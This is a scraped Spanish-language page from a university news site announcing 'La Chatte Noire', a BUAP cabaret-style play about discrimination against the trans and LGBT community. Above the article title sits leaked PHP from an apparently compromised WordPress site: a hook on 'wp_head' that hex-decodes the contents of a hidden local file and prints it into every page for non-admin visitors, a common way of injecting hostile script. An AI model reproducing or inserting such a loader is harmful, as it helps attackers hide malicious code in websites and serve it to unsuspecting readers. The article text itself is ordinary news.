if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } “La Chatte Noire” en el CCU de la BUAP – La Opinión Universitaria La Opinión Universitaria
Menu

“La Chatte Noire” en el CCU de la BUAP

 

  • La obra cuenta con montaje interdisciplinario que busca ser la voz de la comunidad transexual

Por Diego Cuautle

Generar conciencia sobre la discriminación a la comunidad transexual así como de ser un punto de reflexión sobre el discurso de género es lo que se busca en la obra “La Chatte Noire”, que se presentará el próximo lunes 25 de noviembre en el Teatro del Complejo Cultura Universitario de la BUAP.

Durante la presentación, la académica Elvira Ruiz Vivanco comentó que se intenta aportar algo de concientización sobre el tema, tratado desde las artes escénicas y permeando en teorías, las cuales apuestan a una inclusión y el respeto a las otredades.

“La Chatte Noire es producto de una amplia investigación teórica y práctica en el campo del cabaret brechtiano. Todo es producto del trabajo colaborativo entre la Facultad de Arquitectura, Facultad de Artes y a la Escuela de Artes Plásticas y Audiovisuales”, destacó.

Por su parte, el actor y también escritor explicó que la historia narra las vicisitudes de los tres ‘mujercitos’, protagonistas de la obra: La Delirio, la Martirio y la Suprema; quienes trabajan en el célebre cabaret: ‘La Chatte Noire’.

“Es, a través de su performático espectáculo, que estos travestis – vedettes, nos cuentan musical y jocosamente, acerca de episodios represivos contra la comunidad LGBTTTQIP”, comentó.

Agregó que además, se aborda momentos clave, para los movimientos conectados con la equidad de género y con la teoría queer; tales como: el baile de los 41, la revuelta de Stonewall, además de diversas expresiones actuales, de una militancia a favor de las sexualidades periféricas; aspirantes a la conformación de una sociedad: inclusiva, equitativa y respetuosa.

En este sentido, reiteró que quieren ser la voz de quienes ya no tienen voz, es decir, de las personas que han sido asesinadas por odio o por alguna otra situación que se relaciona con su diferencia sexual.

Finalmente informó que la presentación será a las 19:30 horas, por lo que solicitó a quienes acudan al teatro a llegar 30 minutos antes ya que en el lobby será donde se entreguen los pases de cortesía.

 

  • Tweets recientes